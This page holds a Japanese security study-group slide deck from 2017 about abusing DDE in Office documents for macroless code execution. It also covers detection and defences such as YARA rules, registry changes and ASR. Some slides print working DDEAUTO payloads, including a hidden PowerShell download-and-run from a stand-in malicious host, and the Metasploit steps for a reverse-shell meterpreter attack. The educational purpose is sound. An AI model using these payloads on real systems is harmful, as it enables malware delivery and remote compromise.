Submit Search
DDEを悪用する Macroless Office Document Exploits
•
1 like
•
2,119 views
I
Isaac Mathis
Follow
DDEを悪用するマクロ不要のオフィスドキュメント攻撃について
Read less
Read more
1 of 28
Download now
Downloaded 16 times
More Related Content
DDEを悪用する Macroless Office Document Exploits
1.
DDEを悪⽤する Macroless Office Document Exploits ⼤和セキュリティ勉強会 2017/12/23 ⽥中ザック
2.
DDEとは? •“Dynamic Data Exchange” •1987年からあるIPC⼿法の1つ
(Win 2.0+、OS/2) •例:3rdパーティソフトが.xlsデータにアクセス •OLEがDDEに取って代わる •互換性のために残されている(T_T) •ターゲット→MS Officeドキュメント、その他?: Word, Excel, Powerpoint, Access, Outlook, OneNote
3.
Macro不要のOffice攻撃 •マクロを悪用する攻撃は昔からある •メリット:最新版でも脆弱、多くのAVに検知されない 例:Macro/OLE/.HTAによるEmpire感染(悪用禁⽌!) https://enigma0x3.net/2016/03/15/phishing-with-empire/ •デメリット:⼈を騙す必要がある •最近マクロに敏感になっている⼈が増えてきたので、 メモリ破損不要かつマクロ不要の攻撃が注目されている
4.
Macro不要のOffice攻撃 •2016/05/20 Sensepost :
DDE経由で.xlsからコマンド実⾏ https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/ •2017/10/09 Sensepost : DDE経由で.docからコマンド実⾏ https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/
5.
Macro不要のOffice攻撃 挿⼊ → クイックパーツ → フィールド
6.
Macro不要のOffice攻撃
7.
Macro不要のOffice攻撃 • 「!式の終わりが正しくありません。」を 右クリック フィールドコードの表示/非表示をクリック • {DDEAUTO
c:windowssystem32 cmd.exe "/k calc.exe" } を⼊⼒して保存
8.
Macro不要のOffice攻撃
9.
Macro不要のOffice攻撃 (実⾏後に表示↓)
10.
Macro不要のOffice攻撃 { DDEAUTO c:WindowsSystem32cmd.exe
"/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient). DownloadString('http://evilserver.ninja/pp.ps1'); powershell -e $e "}
12.
Macro不要のOffice攻撃 Sensepostはマイクロソフトに Responsible Disclosureしたが、 「これは脆弱性ではなく、仕様です」って ⾔われたから詳細をブログにアップ
13.
Hancitor/Necursボットネット・Locky ランサムウェア •⼀週間以内にRansomwareが悪用しているという報告 https://www.vmray.com/blog/dde-ransomware-macroless-word-doc-analysis/
14.
巧妙な騙し⽅
15.
Outlookも脆弱 •Calender Invite、RTFメール等でOutlookもターゲット •※添付ファイルが無いため、AVが検知・防御できない
16.
対策
17.
対策 •MacかLinuxを利用
18.
対策 •メール訓練でユーザ教育 (Selphishとか?) https://www.selphish.jp/ •※100%ではないので、技術的な対策も必要
19.
検知 •YARAルール https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/ ※回避されるかも •Windowsイベントログの記録されるかも? •起動プロセスを記録 https://www.securityforrealpeople.com/2017/10/exploiting-office-native-functionality.html
20.
防御 (Word) •「⽂書を開いたときにリンクを自動的に更新する」 のチェックを外す
21.
防御 (Office*) •DDEAutoを無効にする(レジストリを弄る) •https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b •注意:Excelがおかしくなる! •よくテストする必要がある!
22.
防御 (Office*) •第三者の「micropatch」を適用? •ソフトが壊れる可能性があるし、 サポートされていないのでおすすめしない •https://0patch.blogspot.jp/2017/10/0patching-office-dde-ddeauto.html
23.
防御 (Office*) •Attack Surface
Reduction (ASR)を利用(おすすめ!) ※Windows 10のWindows Defender Exploit Guard、EMET5+ https://docs.microsoft.com/en-us/windows/threat-protection/windows-defender-exploit-guard/windows-defender-exploit-guard •Email/Webmailの実⾏ファイルをブロック •オフィスアプリは⼦プロセスを起動できない (今回のOutlook攻撃等は防げない) •オフィスアプリは実⾏ファイルを作成できない •オフィスアプリは別プロセスにコードインジェクションできない •JSとVBScriptから実⾏ファイルをダウンロードできない •難読化されたスクリプトを実⾏できない •オフィスマクロからWin32 APIを呼び出せない
24.
MetasploitでDDE攻撃 •wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/ fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb •mv dde_delivery.rb
/usr/share/metasploit-framework/modules/exploits/windows/ •msfconsole •use exploit/windows/dde_delivery •set SRVHOST 192.168.177.141 •set PAYLOAD windows/meterpreter/reverse_tcp •set LHOST 192.168.177.141 •set LPORT 6708 •exploit •{DDEAUTO C:ProgramsMicrosoftOfficeMSword.exe........windows system32mshta.exe “http://192.168.177.141:8080/mVg3YDU3gVQ”}を.docに⼊れて送る •リンク:https://gbhackers.com/exploiting-windows-dde-exploit/ (悪用禁⽌!)
25.
幸いなこと∼ (ペンテスターにとっては残念なこと?)
26.
「マイクロソフトがWordのDDE機能を デフォルトで無効に。 月例パッチで自動適用」 http://nanashi0x.hatenablog.com/entry/2017/12/16/200000 @0x31_noseをチェック(Linux⼊門とかもある) ExcelもいつかMSのパッチでデフォルトで 無効になる?
27.
結論 ⼀時流⾏っていた フィッシング攻撃? マクロを有効にすると 同じようなハードルがあるので微妙 念のため無効にした⽅が安全
28.
ご清聴有難う御座います
Download